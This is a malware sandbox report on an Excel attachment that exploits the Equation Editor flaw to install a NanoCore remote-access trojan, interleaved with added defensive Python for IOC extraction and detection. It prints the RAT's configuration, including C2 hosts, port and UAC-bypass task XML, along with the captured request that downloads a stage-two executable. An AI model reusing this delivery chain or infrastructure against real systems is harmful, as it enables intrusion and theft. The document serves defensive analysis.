Windows Analysis Report: Import order764536.xlsx

Overview

General Information

Sample Name: Import order764536.xlsx
Analysis ID: 501830
MD5: cf9700bcf6687a0f9bc3b205b43b40ba
SHA1: 1bcc9522f4f8e1938939e2721b834c5f51cf81d1
SHA256: 61c38201d62bd19e606f4f4e78805932442d872aea57651ab949b96bbb6b4121
Tags: VelvetSweatshop, xlsx (VelvetSweatshop is the default password Excel uses to open an encrypted workbook without prompting, so the tag means the document was delivered encrypted with that key to evade static scanning)

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRAR (self-extracting archive)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Potential document exploit detected (performs HTTP gets)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

AV Detection:

Yara detected Nanocore RAT
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR
Found malware configuration
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n 
<Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
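The extracted configuration above is the most useful artifact on this page for a responder: it carries both C2 endpoints, the port, and the settings that change host behaviour (BypassUAC, ClearZoneIdentifier, UseCustomDNS). The following helper, added here as an example and not Joe Sandbox or NanoCore code, parses that configuration, separates hostnames from literal IPs (NanoCore puts the IP in a "Domain" slot), reads the run level out of the embedded task XML, and matches the IOCs against network log lines. SAMPLE_CONFIG is a trimmed, constructed copy of the report's configuration with most timing fields dropped; its task XML keeps only the elements the checks read and closes the Task element that the report prints truncated. The log lines are constructed as well, modelled on the traffic entries in the Networking section.

```python
"""Triage helper for the NanoCore configuration extracted above.

Added example, not Joe Sandbox or NanoCore code. SAMPLE_CONFIG is a trimmed,
constructed copy of the report's configuration; its task XML keeps only the
elements the checks read. SAMPLE_NET_LOG is constructed too.
"""
import ipaddress
import json
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

SAMPLE_CONFIG = json.dumps({
    "Version": "1.2.2.0",
    "Mutex": "c213d282-998c-4a04-8f80-944681ca",
    "Group": "nano stub",
    "Domain1": "ezeani.duckdns.org",
    "Domain2": "194.5.98.48",        # NanoCore stores a literal IP in a "Domain" slot
    "Port": 8338,
    "RunOnStartup": "Disable",
    "RequestElevation": "Disable",
    "BypassUAC": "Enable",
    "ClearZoneIdentifier": "Enable",
    "PreventSystemSleep": "Enable",
    "UseCustomDNS": "Enable",
    "PrimaryDNSServer": "8.8.8.8",
    "BypassUserAccountControlData":
        '<?xml version="1.0" encoding="UTF-16"?>'
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Principals><Principal id="Author"><LogonType>InteractiveToken</LogonType>'
        '<RunLevel>HighestAvailable</RunLevel></Principal></Principals>'
        '<Settings><Hidden>false</Hidden></Settings>'
        '<Actions Context="Author"><Exec><Command>"#EXECUTABLEPATH"</Command>'
        '<Arguments>$(Arg0)</Arguments></Exec></Actions></Task>',
})

# Settings whose "Enable" value changes what a responder has to look for.
RISKY = {
    "BypassUAC": "elevates through a HighestAvailable scheduled task, no consent prompt",
    "ClearZoneIdentifier": "strips the Zone.Identifier stream (Mark-of-the-Web) from drops",
    "PreventSystemSleep": "keeps the host awake so the session stays connected",
    "UseCustomDNS": "resolves C2 names via 8.8.8.8 itself, bypassing the local resolver's logs",
}

def load_config(text):
    return json.loads(text)

def extract_iocs(cfg):
    """Split NanoCore's Domain1/Domain2 into hostnames and literal IPs; keep the port."""
    iocs = {"hosts": [], "ips": [], "port": int(cfg["Port"])}
    for key in ("Domain1", "Domain2"):
        value = cfg.get(key, "").strip()
        if not value:
            continue
        try:
            iocs["ips"].append(str(ipaddress.ip_address(value)))
        except ValueError:
            iocs["hosts"].append(value.lower())
    return iocs

def risky_settings(cfg):
    """Enabled settings from RISKY, sorted so the output is stable."""
    return sorted(k for k in RISKY if cfg.get(k) == "Enable")

def inspect_task_xml(xml_text):
    """Pull run level and command out of the UAC-bypass task template."""
    # The declaration claims UTF-16 but the extractor hands us text; drop it before parsing.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(body)
    run_level = root.findtext(f".//{TASK_NS}RunLevel")
    command = root.findtext(f".//{TASK_NS}Exec/{TASK_NS}Command")
    return {"run_level": run_level, "command": command,
            "elevates": run_level == "HighestAvailable"}

def match_network_log(iocs, lines):
    """Return lines whose destination is a configured host, IP, or port."""
    dest_port = re.compile(rf"->\s*\S+:{iocs['port']}$")
    hits = []
    for line in lines:
        low = line.lower()
        if (any(h in low for h in iocs["hosts"])
                or any(ip in line for ip in iocs["ips"])
                or dest_port.search(line)):
            hits.append(line)
    return hits

SAMPLE_NET_LOG = [  # constructed, modelled on the Networking section
    "DNS query: ezeani.duckdns.org",                  # hostname from Domain1
    "TCP 192.168.2.22:49167 -> 194.5.98.48:8338",     # Domain2 IP on the configured port
    "TCP 192.168.2.22:49166 -> 97.107.138.110:443",   # stage-two download, not in the config
    "DNS query: demopicking.renova-sa.net",
]

if __name__ == "__main__":
    cfg = load_config(SAMPLE_CONFIG)
    print(extract_iocs(cfg))
    print(risky_settings(cfg))
    print(inspect_task_xml(cfg["BypassUserAccountControlData"]))
    print(match_network_log(extract_iocs(cfg), SAMPLE_NET_LOG))
```

Two points the output makes visible: the stage-two download host (demopicking.renova-sa.net, 97.107.138.110) is not in the configuration at all, so blocking only what the extractor reports leaves the delivery infrastructure untouched; and UseCustomDNS means the duckdns lookup may never reach the corporate resolver, so the DNS query evidence in this report comes from the sandbox's packet capture, not from resolver logs.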
Multi AV Scanner detection for dropped file
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Virustotal: Detection: 27%
Source: C:\Users\user\33920049\mmuiqlcvwo.pif ReversingLabs: Detection: 32%
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.RegSvcs.exe.ae0000.4.unpack Avira: Label: TR/NanoCore.fadte
Source: 6.2.RegSvcs.exe.340000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 13.2.RegSvcs.exe.2d0000.0.unpack Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
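The two process creations above are the whole exploit story: EQNEDT32.EXE is activated by Excel through COM (the -Embedding argument), then the Equation Editor, which has no legitimate reason to spawn anything, creates C:\Users\Public\vbc.exe. The following check, added here as an example and not Joe Sandbox or Sigma project code, encodes the same logic the "Droppers Exploiting CVE-2017-11882" and "File Dropped By EQNEDT32EXE" Sigma hits rely on, and runs it over constructed process-creation events built from the parent/child pairs in this report. Sysmon-style field names (ParentImage, Image, CommandLine) are assumed as the input schema.

```python
"""Process-creation check for the Equation Editor chain recorded above.

Added example, not Joe Sandbox or Sigma code. SAMPLE_EVENTS are constructed
from the parent/child pairs the report prints; the field names follow Sysmon
Event ID 1 and are an assumption about the log source.
"""
import ntpath
from dataclasses import dataclass

EQNEDT = "eqnedt32.exe"
# User-writable locations an Office helper has no business launching binaries from.
WRITABLE_DIRS = ("\\users\\public\\", "\\appdata\\", "\\programdata\\", "\\windows\\temp\\")

@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str = ""

def _is_eqnedt(path):
    return ntpath.basename(path).lower() == EQNEDT

def classify(ev):
    """Names of the checks that fire for one process-creation event."""
    hits = []
    if _is_eqnedt(ev.image) and "-embedding" in ev.command_line.lower():
        # COM activation from an Office document: benign on its own, but the
        # precursor to every CVE-2017-11882 / CVE-2018-0802 chain.
        hits.append("eqnedt32_started_via_ole")
    if _is_eqnedt(ev.parent_image) and not _is_eqnedt(ev.image):
        # Equation Editor never legitimately spawns children; a child means the
        # exploit's shellcode reached CreateProcess.
        hits.append("eqnedt32_spawned_child")
        if any(d in ev.image.lower() for d in WRITABLE_DIRS):
            hits.append("child_from_user_writable_dir")
    return hits

def scan(events):
    """Map each event index to the checks it triggers, skipping clean events."""
    results = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[i] = hits
    return results

SAMPLE_EVENTS = [
    # Constructed: the two process creations the report attributes to EQNEDT32.
    ProcEvent(parent_image="",  # the report lists this parent as unknown
              image=r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              command_line=r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(parent_image=r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              image=r"C:\Users\Public\vbc.exe",
              command_line=r"C:\Users\Public\vbc.exe"),
    # Constructed benign control: the shell launching Excel itself.
    ProcEvent(parent_image=r"C:\Windows\explorer.exe",
              image=r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              command_line=r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index].image, hits)
```

The first check alone is noisy on hosts that still use the Equation Editor for real documents; the second is the one to alert on, and it does not depend on the child's name, which here is the throwaway vbc.exe. Microsoft removed EQNEDT32.EXE with the January 2018 Office updates, so on a patched estate the component starting at all is worth a look.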
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_0026A2DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_0027AFB9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00289FD3 FindFirstFileExA, 4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose, 5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100DE7C FindFirstFileW,FindClose, 5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00FFBF17

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 97.107.138.110:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: demopicking.renova-sa.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 97.107.138.110:443

Networking:

Uses dynamic DNS services
Source: unknown DNS query: name: ezeani.duckdns.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: ezeani.duckdns.org
Source: Malware configuration extractor URLs: 194.5.98.48
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive
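The report prints the stage-two request with its CRLFs stripped, so the headers run together; recovering them shows a request for an .exe with no Referer and an IE compatibility-mode user agent, which on a Windows 7 host is what urlmon sends for URLDownloadToFile rather than what a browser tab sends. The following parser and triage function, added here as an example and not part of the original report, re-splits that exact line and states the reasons it reads as a payload fetch. The header names used to cut the string back into fields are an assumption that covers the headers seen here and would need extending for other captures.

```python
"""Re-split and triage the flattened HTTP request printed above.

Added example, not part of the original report. FLATTENED is the report's own
GET line; KNOWN_HEADERS is an assumption covering the headers seen in it.
"""
import re

# Longest names first so "Accept-Encoding" is not cut at "Accept".
KNOWN_HEADERS = ("Accept-Encoding", "User-Agent", "Connection", "Accept", "Host")
EXECUTABLE_EXT = (".exe", ".pif", ".scr", ".dll")
# IE compatibility-mode string; on Windows 7 this is what urlmon's
# URLDownloadToFile sends, so it rarely marks a real browser session.
LEGACY_IE_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE [67]\.0;")

FLATTENED = (
    "GET /asdERTYgh56F.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net"
)

def parse_flattened_request(text):
    """Recover method, path, version and headers from a request whose CRLFs were lost."""
    m = re.match(r"(\S+) (\S+) (HTTP/\d\.\d)", text)
    if not m:
        raise ValueError("no HTTP request line at start of text")
    method, path, version = m.groups()
    names = "|".join(re.escape(h) for h in KNOWN_HEADERS)
    # Cut just before every "<known-name>: "; each value runs to the next cut.
    headers = {}
    for part in re.split(rf"(?=(?:{names}): )", text[m.end():]):
        if part:
            name, _, value = part.partition(": ")
            headers[name] = value
    return {"method": method, "path": path, "version": version, "headers": headers}

def triage(req):
    """Reasons this request looks like a payload fetch rather than browsing."""
    reasons = []
    if req["path"].lower().endswith(EXECUTABLE_EXT):
        reasons.append("requests an executable")
    if LEGACY_IE_UA.match(req["headers"].get("User-Agent", "")):
        reasons.append("legacy MSIE user agent typical of urlmon downloads")
    if "Referer" not in req["headers"]:
        reasons.append("no Referer, so not a click from a page")
    return reasons

if __name__ == "__main__":
    request = parse_flattened_request(FLATTENED)
    for name, value in request["headers"].items():
        print(f"{name}: {value}")
    print(triage(request))
```

The same user agent on port 443 to the same host (the TLS 1.2 connection to 97.107.138.110 listed below) is why the download itself is not visible in this capture beyond the JA3 fingerprint; a proxy that terminates TLS would see the identical request.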
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE
Source: Joe Sandbox View ASN Name: LINODE-AP Linode LLC US
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 194.5.98.48
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.5.98.48:8338
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://crl.globalsign.net/root.crl0
